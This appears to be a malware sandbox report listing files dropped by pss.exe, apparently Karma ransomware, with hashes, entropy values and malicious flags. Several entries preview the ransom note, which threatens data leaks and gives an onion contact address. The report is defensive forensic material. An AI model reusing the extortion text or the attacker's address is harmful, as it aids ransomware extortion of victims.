SHA-512:CFF6C0EE11888D54F966757387C9BD24A0609F1D1F7CC6DC18434E0AAF4327974550F0036FA62FE649EBA9DB3DF18BC0413E6FBD6316EBDB47AB179B0BAC75C9
Malicious:false
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):13596
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:192:lEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2+:46666666666R
MD5:A6FF770C7AFD807A563E15F97B28F316
SHA1:4806E8768B03797BC2DC26C70D35BEF60236978D
SHA-256:493945C22AD4529238DBA3176D598495B0716195FF3D4FBF6F0BD76230D53A37
SHA-512:FD11AAB07F6F58C1CC34F2E1BC16638270DA467906658C55608E94834EAC39FC244BC347CBA7EA040458E13CC82A5CA558030FCCDD61283ABB3A6C1F96A83BFB
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat
Process:C:\Users\user\Desktop\pss.exe
File Type:PGP\011Secret Sub-key -
Category:dropped
Size (bytes):245257
Entropy (8bit):7.99918756717482
Encrypted:true
SSDEEP:6144:rCL7CI70kgVL7sYUyieBt2C/lFFw6fGQqFzev:E+IYkORKC/lsXLFw
MD5:09C721B665625F7FCAD0A39245F574EA
SHA1:2814AC28DC8EE86D7E6089DFA4B9A9E696F2C68C
SHA-256:EBDFAFDEF0A3A9588BC989C6EB25FE77938444D7A4D0648E0C718E96DEB31571
SHA-512:47A976A42B103A4A9A691C57066D33E7C6C579C798251B74278CABCF57B2C9CFFB8F8EAC9D089AAA063ADA7C08DDFD422E712DC8DEB09C3E895F3F0E33F05AC7
Malicious:true
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):13596
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:192:lEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2+:46666666666R
MD5:A6FF770C7AFD807A563E15F97B28F316
SHA1:4806E8768B03797BC2DC26C70D35BEF60236978D
SHA-256:493945C22AD4529238DBA3176D598495B0716195FF3D4FBF6F0BD76230D53A37
SHA-512:FD11AAB07F6F58C1CC34F2E1BC16638270DA467906658C55608E94834EAC39FC244BC347CBA7EA040458E13CC82A5CA558030FCCDD61283ABB3A6C1F96A83BFB
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):12357
Entropy (8bit):7.985861124591946
Encrypted:false
SSDEEP:192:BnhMmmzAjR74li3+cdq3jF3T/9smDxNka74seUulWiEzS8yFn18R7vpo0Usmq:BnLmsjREliOcM3BsmDx2OXlYU0nq
MD5:67A2226F3D675963F6C4F0872FCFAEB8
SHA1:35956D1D6DA69147803AED5EBFAE5E75CCAA55C0
SHA-256:921CD359D0D81C2C9FF87AEFCD30DD4F21A96590889D2B72C9CAD283C4175001
SHA-512:22E5FCC7053DD294B2E500C42D8E3FA9DA9FA4BC385E40801E434E382AA02C2F924FD3D5E2A61F493DE539C5FED8CCEB0A46CC7DF451FDD2530101547DD5E609
Malicious:false
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):63667
Entropy (8bit):7.996620789477532
Encrypted:true
SSDEEP:1536:Fu1xQ3f2ILT3eoJ7dgnqzOd8lKYMvD+QG80HV8cTfPl:FJje6JtzOucDN+WI
MD5:B7B7CE3755BF0B308E333B67A5F9EBDD
SHA1:760278EFDE110FFEB6632E6D8FE44CD18ED8CCF1
SHA-256:545EDAEE693796F2B6C1854FA8DA54AAF72A59461F4C61D5E5E6BE21DFFF98E0
SHA-512:7B47D6BA0630D8B4AFAEB480CBFDEC0EAAC0B5B0994A82DB26DAC436359FD29C6E03E78B419FB80DD34EBB34D5DEDC9EBAEB48A83E9C406251C0FA576FAAD2BE
Malicious:true
C:\Users\user\AppData\Local\Adobe\Acrobat\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):13596
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:192:lEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2+:46666666666R
MD5:A6FF770C7AFD807A563E15F97B28F316
SHA1:4806E8768B03797BC2DC26C70D35BEF60236978D
SHA-256:493945C22AD4529238DBA3176D598495B0716195FF3D4FBF6F0BD76230D53A37
SHA-512:FD11AAB07F6F58C1CC34F2E1BC16638270DA467906658C55608E94834EAC39FC244BC347CBA7EA040458E13CC82A5CA558030FCCDD61283ABB3A6C1F96A83BFB
Malicious:false
C:\Users\user\AppData\Local\Adobe\Color\ACECache11.lst
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):667
Entropy (8bit):7.7271977987515
Encrypted:false
SSDEEP:12:83g0djs8PKnM8np6k/BkbXDrxd8tibhueAWwUbrbspetdsb:83FY8PGnp6k/Bg8tCRwyKb
MD5:4C558D46A54E4FA0E189D1914FFECCE1
SHA1:357A1804950323DBDF39A619D94E374493768AC9
SHA-256:CA03CA6ABA9DAA9AD61C61409722613CE43F7DB61E8B7776FED1793DDA1C4AE4
SHA-512:E684C8055B624071C91227A2ECCDA58542AAA2031B57EF1F1E5182D50A0208AC6E8D19F1CE50772CFF56C6EE5044394F0EEADEF8D9E7BE965064ABD0E82DFF80
Malicious:false
C:\Users\user\AppData\Local\Adobe\Color\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):13596
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:192:lEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2+:46666666666R
MD5:A6FF770C7AFD807A563E15F97B28F316
SHA1:4806E8768B03797BC2DC26C70D35BEF60236978D
SHA-256:493945C22AD4529238DBA3176D598495B0716195FF3D4FBF6F0BD76230D53A37
SHA-512:FD11AAB07F6F58C1CC34F2E1BC16638270DA467906658C55608E94834EAC39FC244BC347CBA7EA040458E13CC82A5CA558030FCCDD61283ABB3A6C1F96A83BFB
Malicious:false
C:\Users\user\AppData\Local\Adobe\Color\Profiles\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):13596
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:192:lEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2+:46666666666R
MD5:A6FF770C7AFD807A563E15F97B28F316
SHA1:4806E8768B03797BC2DC26C70D35BEF60236978D
SHA-256:493945C22AD4529238DBA3176D598495B0716195FF3D4FBF6F0BD76230D53A37
SHA-512:FD11AAB07F6F58C1CC34F2E1BC16638270DA467906658C55608E94834EAC39FC244BC347CBA7EA040458E13CC82A5CA558030FCCDD61283ABB3A6C1F96A83BFB
Malicious:false
C:\Users\user\AppData\Local\Adobe\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):14832
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:192:lEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2+:466666666666R
MD5:A10DA1249D52B7A32168307227105DD9
SHA1:1F69AFECFCF5EE4A9C697CB16C5344D88B99E4AC
SHA-256:71AD8BFD0761492EC5325A98B78EFD77AFDCFB71C1A3D05C002475C57FF5D92C
SHA-512:20DBEC3C497E276CFF87790BAAB13F7C99F4B8431FBFE42A465C419FB3DB382001B05F66AD50F3E2B212B577ECF001AE4B13DA46038ED1200ED29333943CC0C5
Malicious:false
C:\Users\user\AppData\Local\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):14832
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:192:lEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2cEBF2+:466666666666R
MD5:A10DA1249D52B7A32168307227105DD9
SHA1:1F69AFECFCF5EE4A9C697CB16C5344D88B99E4AC
SHA-256:71AD8BFD0761492EC5325A98B78EFD77AFDCFB71C1A3D05C002475C57FF5D92C
SHA-512:20DBEC3C497E276CFF87790BAAB13F7C99F4B8431FBFE42A465C419FB3DB382001B05F66AD50F3E2B212B577ECF001AE4B13DA46038ED1200ED29333943CC0C5
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException\Low\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException\container.dat
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):69
Entropy (8bit):5.546859420514927
Encrypted:false
SSDEEP:3:F+jje9WJdw1lR1v8PGS2YRk/rJ:F+Y68/
MD5:5B499BED35FED7243509F451A75928E7
SHA1:5FABF5457BE665924EFD0345849A8E713EDC1F01
SHA-256:828D1258E9D7E635A146E99305A030D7080B24921437D874F962E9557B662FF8
SHA-512:294F2342BE760D021E47337C451BACE54888FCE29DC7A4F468A6AC589EF0889C0AB28D4D97E429A710988F23B37B3A7BDD7C936DA150F5C3F211A5B4A6B4C843
Malicious:false
Preview: ..c4..m..i..Yn.{...w3{.......=.j=-tR...e..n...1...|=. .....KARMA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\ESE\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\ESE\container.dat
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):69
Entropy (8bit):5.600994746507819
Encrypted:false
SSDEEP:3:7CHl/Kx+VqtM0115:Qli7M0r5
MD5:E0A45DCCAA9B437A536F14824F97A152
SHA1:BA550F9FA20C67569823FAC2931422EA62AC5B17
SHA-256:6A559727651492A2565DC8B3886AD98277012C99550F1776D392A4C62C913B6D
SHA-512:03139DC5358EDFD0CD55959AD5F718FB7AC0F3AA145F73EC5DD046A6F4DBF5D52F7B96C13AC2E7428DBA6CE350AD744CA7FA9A8311821F5371DFA9BA020ABF8D
Malicious:false
Preview: 3.:.z....nO_.u...[.i.LARe.3....O.*...|.../..P..}<m..9.......KARMA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Low\ESE\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Low\ESE\container.dat
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):69
Entropy (8bit):5.737370247003717
Encrypted:false
SSDEEP:3:TNavKfB6lGAZkolOKupk35:TNavE2oKJ
MD5:02B7046153A5999A7407DA486AAFBF80
SHA1:D0F479A6D0D8CE262EB5C3DB9EF20470EDDA0E9B
SHA-256:C42CF58ACF126C010107B40A6EBD3504ACDA5B01FD89F159EC9C4D43C3DF0748
SHA-512:78C6D29BB76FEAAF95DD682C13235BC13F994418347B9DDB86601A8BB46FD14F0B7591FD97006CC967F1D332FB08F312EA603394EFD376C1D7B3EEA8F227AABC
Malicious:false
Preview: .I.s..cS.^..T..(..mM.d....vG..."..jb..NB4...u...F.o....dE...KARMA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Low\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\container.dat
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):69
Entropy (8bit):5.640920652336276
Encrypted:false
SSDEEP:3:9JT4o8cD7aYB9dT9:rT18JYz19
MD5:E51761D4EAEB7C232441C672460CC10F
SHA1:8C33F89BE3A2490024AA3199415C92638B0B1D1A
SHA-256:1AFDAE05A0921A5E4F6F314600C0586E028DBD748A49067572090AE744198472
SHA-512:1CA48BB3C72C801E95FC8723768C68C620654D68597748EB31860DBB7BA7EDD33850B6217FBB056300A8DF45E7F6A89254EF6681B1636F50BDE1ECD58EF1A067
Malicious:false
Preview: .L..,..H....X]t;...g..[=..\...\.Eac.T.u...W..W.E..g..:m.OG...KARMA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\deprecated.cookie
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):160
Entropy (8bit):6.663016082604735
Encrypted:false
SSDEEP:3:pqGGJSezV7JTlQGv2B7XSS+z8EQWy1NykjlG8GFPdpUcZ8MFBoflDKp0n:kGGJSezVPQeXS+4EQWClU5FNFiNC0
MD5:C5FFF037728FEAA3C3B1828E31E766BC
SHA1:CFCB22ADA29D280B28B5DC3C7127F3D96D34DEAC
SHA-256:B8F60BD82CCE7E6E946B4B4A389ED3E584102B481C14D689923FA6988CC21C99
SHA-512:865004CB32567870F62ED3BEB5CF38740A3D1779DE8C0CEF1FFAB75ADB9B73632A30BBD73A6236C26C20BB21F2EB770692F10E634C3282C5D8BA3FA8B8335FDE
Malicious:false
Preview: ..+...a#.?Il/.Piz....W...v..8...Ep..D.N.~...E. z......T.........KARMAq..V.fL0h.$.........h..m..p../,..#`............M{%..L....&..:...c......TA....&.U...-...
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Collab\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:true
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Forms\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:true
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):91
Entropy (8bit):6.021369777490013
Encrypted:false
SSDEEP:3:OwciWC5qPWl3zw3DkSNI0cB/JF:SG33bSNKZJF
MD5:64DF21A61C35870DC56FCC0930CFDCAA
SHA1:31F84225755338C7BC9D509A5AD4AE1608ECBF01
SHA-256:14061BAEB91E88CC9F57EC449EABA09E9AF5DFC976E83CFA1FC6AC87F6A7A122
SHA-512:9D263283287D6BBE7B9491EF6486828EA788E8125CB5974693FDB670CECABD107AAC5A4A21B35C654A24B5AE076C91294A6DC2A7C929EA468584B668902218E7
Malicious:false
Preview: @.......F......'.....:{<.Y......uVN.~..ss...jzY..W..J..N.....KARMA.-..o.e.TsjQg.).d\..h.
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):93
Entropy (8bit):6.161530687680467
Encrypted:false
SSDEEP:3:XgGa1WEIrE+fT5dYngEtukGg9aUcrLgn:XgwZrj7nYnJtukG9In
MD5:CD12F2ED0AE2114FA657FCA5D1878F9B
SHA1:30CFB72690CEEC8953B712C32FC8A23DE70B4776
SHA-256:F947B5D2613586C3D99145D791E2CE3B62F560C7AAD0F380C5E3EC68FE75A466
SHA-512:E0E7FF717E00A232F13E8DB47D5C08EF742813D959C6A52E7F36907EFC62FB89B6DE2489C14BB24B33ECB41321067EA311E3616163B9A68183884CC850ABAA0F
Malicious:false
Preview: ...oG.i.....3J.|F..(...............}.n.F......&......s...KARMA....a.&ZCj...W..$.#...
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:true
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):706
Entropy (8bit):7.676113993274977
Encrypted:false
SSDEEP:12:pl5RH4Iorq0Td+K0taPEopf89fxdLmyWTn7lePosnF++HzUO8JulnlCH:pnRHUq0Td/N8/NxZFWV6nxHz8mQ
MD5:27C1477E5AA3CE03EAA01722A4595F57
SHA1:E292573EE78431A8D2A89983C802E357F2A49777
SHA-256:019883A24CD275D8454B3320C8F76DFA9CFB5BE4CBC1732A3205DAA3A9960C06
SHA-512:1552E5C39809206D4FB03C5763DE5DF0B8A1711811E67BDB049B000633C33B890ED376A0E3C73B413018E35BC9BBA921CA15E32873BF33D3C267717DB002E1BB
Malicious:false
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):494
Entropy (8bit):7.558060732139472
Encrypted:false
SSDEEP:12:pbwoRMeuEnMrrqxh2m+MLvi5sUKFbbNp8krOdIQIf3Xcv7H9Hn:bRPiQLvijKfOa5fHcv7H9Hn
MD5:0070F4B1962CA5A369B8650C6767E868
SHA1:0736799BDBDE98209CAFF77EFACFC9D90A624086
SHA-256:FDAA94EBA1AB85FC395DB5B8631E17A0FA2B1A2CAC7684DD36EAEA1E343DF8A1
SHA-512:5E24E1177B2776EE7CC9BEF90519B3FEDE31DF770197728AA51A94E8F0E2E98435DCD93FBC1778ECDE610B8E7F25745AC054FB4879E44E50FE66EFB68AB0A38E
Malicious:false
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
